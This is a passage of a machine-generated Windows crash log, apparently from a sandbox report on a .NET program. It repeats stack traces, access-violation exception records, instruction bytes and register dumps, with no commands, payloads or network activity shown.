DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 4a 34 00 6b 8b f8 e9 2c fd ff ff 89 7d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x686d6d7
registers.esp: 88140016
registers.edi: 88140060
registers.eax: 46128536
registers.ebp: 88140076
registers.edx: 46128536
registers.ebx: 5
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6869f8f
mscorlib+0xd14496 @ 0x72314496
0x6866eaf
0x6860b91
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d3711 @ 0x718d3711
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x6860825
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2abe6 @ 0x7202abe6
mscorlib+0xa2c940 @ 0x7202c940
mscorlib+0xa2ca0e @ 0x7202ca0e
0x686022e
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 c2 24 00 6b 8b f8 e9 2c fd ff ff 89 7d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x686e65f
registers.esp: 88140016
registers.edi: 88140060
registers.eax: 46177620
registers.ebp: 88140076
registers.edx: 46177620
registers.ebx: 9
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6869f8f
mscorlib+0xd14496 @ 0x72314496
0x6866eaf
0x6860b91
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d3711 @ 0x718d3711
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x6860825
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2abe6 @ 0x7202abe6
mscorlib+0xa2c940 @ 0x7202c940
mscorlib+0xa2ca0e @ 0x7202ca0e
0x686022e
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 fd 20 00 6b 8b d8 e9 1c fd ff ff e8 0e
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x686ea24
registers.esp: 88139992
registers.edi: 88139992
registers.eax: 46178264
registers.ebp: 88140076
registers.edx: 46178264
registers.ebx: 10
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6864f21
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 3e 1b 47 f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a0589
registers.esp: 104721644
registers.edi: 51244768
registers.eax: 0
registers.ebp: 104721756
registers.edx: 118119717
registers.ebx: 50092816
registers.esi: 50019256
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x70a0583
0x6864f21
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 3b 42 04 7f 73 b9 b0 91 0e 01 ba 6d 00 00 00 e8
exception.instruction: cmp eax, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a4b3f
registers.esp: 104721520
registers.edi: 51928992
registers.eax: 0
registers.ebp: 104721636
registers.edx: 0
registers.ebx: 50092816
registers.esi: 104721520
registers.ecx: 49866560
1 0 0

__exception__

stacktrace:
0x6864f21
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 3e 1b 47 f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a0589
registers.esp: 104721644
registers.edi: 51928992
registers.eax: 0
registers.ebp: 104721756
registers.edx: 118115996
registers.ebx: 50092816
registers.esi: 51307432
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x74061194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x73f32ba1
mscorlib+0x2f45b0 @ 0x718f45b0
mscorlib+0x2f4541 @ 0x718f4541
mscorlib+0x2f44df @ 0x718f44df
mscorlib+0x2e883b @ 0x718e883b
0x70a2e44
0x70a2da4
0x70a1e5f
0x70a1bf4
0x70a053c
0x6864f21
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 104720280
registers.edi: 0
registers.eax: 104720280
registers.ebp: 104720360
registers.edx: 0
registers.ebx: 6157416
registers.esi: 5914568
registers.ecx: 3103307790
1 0 0

__exception__

stacktrace:
0x6864f21
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 3e 1b 47 f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a0589
registers.esp: 104721644
registers.edi: 46685984
registers.eax: 0
registers.ebp: 104721756
registers.edx: 118119717
registers.ebx: 50092816
registers.esi: 46610188
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x70a0583
0x6864f21
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 3b 42 04 7f 73 b9 b0 91 0e 01 ba 6d 00 00 00 e8
exception.instruction: cmp eax, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a4b3f
registers.esp: 104721520
registers.edi: 47356040
registers.eax: 0
registers.ebp: 104721636
registers.edx: 0
registers.ebx: 46570232
registers.esi: 104721520
registers.ecx: 46553620
1 0 0

__exception__

stacktrace:
0x6864f21
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x68607b4
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 78 04 b9 50 b3 9f 71 e8 3e 1b 47 f9 8d 56 10
exception.instruction: mov edi, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x70a0589
registers.esp: 104721644
registers.edi: 47356040
registers.eax: 0
registers.ebp: 104721756
registers.edx: 118115996
registers.ebx: 46570232
registers.esi: 46732880
registers.ecx: 5915148
1 0 0

__exception__

stacktrace:
0x6864f21
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d36ad @ 0x718d36ad
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
